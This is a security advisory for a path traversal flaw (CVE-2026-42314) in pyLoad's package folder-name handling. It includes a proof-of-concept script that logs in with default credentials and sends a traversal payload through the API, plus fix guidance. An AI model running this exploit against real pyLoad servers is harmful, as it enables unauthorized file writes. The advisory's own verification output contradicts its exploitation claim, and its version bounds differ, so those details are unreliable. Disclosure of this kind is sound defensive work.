CVE-2026-42314: pyLoad: Path Traversal via Package Folder Name
Insufficient sanitization of package folder names allows writing files outside the intended download directory.
Affected Component - src/pyload/core/api/init.py - Function: addpackage()
Description Package folder names are sanitized using insufficient string replacement:
python folder = ( folder.replace("http://", "") .replace("https://", "") .replace("../", "") # Bypassable! .replace("..\\", "") .replace(":", "") .replace("/", "") .replace("\\", "") )
The ../ replacement is bypassable. The pattern ....// becomes .. after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS.
Proof of Concept
Setup bash pip install pyload-ng[all] pyload -d & Default credentials: pyload / pyload
Exploit python #!/usr/bin/env python3 import requests
BASEURL = "http://localhost:8000" USERNAME = "pyload" PASSWORD = "pyload"
session = requests.Session()
Login session.post(f"{BASEURL}/login", data={ "username": USERNAME, "password": PASSWORD })
Create package with malicious folder name The pattern ....// bypasses the ../ replacement After sanitization: .. (still contains ..) folderpayload = "....//....//....//tmp/evil"
resp = session.post(f"{BASEURL}/api/addpackage", json={ "name": "testpackage", "links": ["http://example.com/file.txt"], "dest": 1 # Destination.QUEUE })
packageid = resp.json() print(f"Created package: {packageid}")
Set malicious folder name resp = session.post(f"{BASEURL}/api/setpackagedata", json={ "packageid": packageid, "data": {"folder": folderpayload} })
print(f"Set folder payload: {folderpayload}") print(f"Response: {resp.statuscode}")
When download occurs, files will be written outside download dir print("[+] When a file is downloaded, it will be written to manipulated path") print(" The sanitized folder still contains '..' sequences that OS resolves")
Verification Check where files would be written: python import os
downloaddir = "/home/user/Downloads" folder = "....//....//....//tmp/evil"
Simulate pyLoad's sanitization sanitized = folder.replace("../", "").replace("/", "") print(f"After pyLoad sanitization: {sanitized}") Output: ......tmpevil
When pyLoad does os.path.join and then opens the file: finalpath = os.path.join(downloaddir, sanitized) print(f"Joined path: {finalpath}") Output: /home/user/Downloads/......tmpevil
The .. sequences remain and could be resolved by OS during file operations
Impact Authenticated users with ADD permission can: - Write files outside the download directory - Potentially overwrite system files (depending on permissions) - Clutter system directories with downloaded content
Other sources
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. The pattern ....// becomes .. after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2026-42314?
CVE-2026-42314 is classified as a moderate severity vulnerability due to insufficient sanitization of package folder names.
How do I fix CVE-2026-42314?
To fix CVE-2026-42314, upgrade to pyload-ng version 0.5.0b3.dev100 or later.
What components are affected by CVE-2026-42314?
CVE-2026-42314 affects the `src/pyload/core/api/__init__.py` file, particularly the `add_package()` function.
What does CVE-2026-42314 allow an attacker to do?
CVE-2026-42314 allows an attacker to write files outside the intended download directory.
Is CVE-2026-42314 specific to a particular version of pyload-ng?
Yes, CVE-2026-42314 affects all versions of pyload-ng up to and including 0.5.0b3.dev79.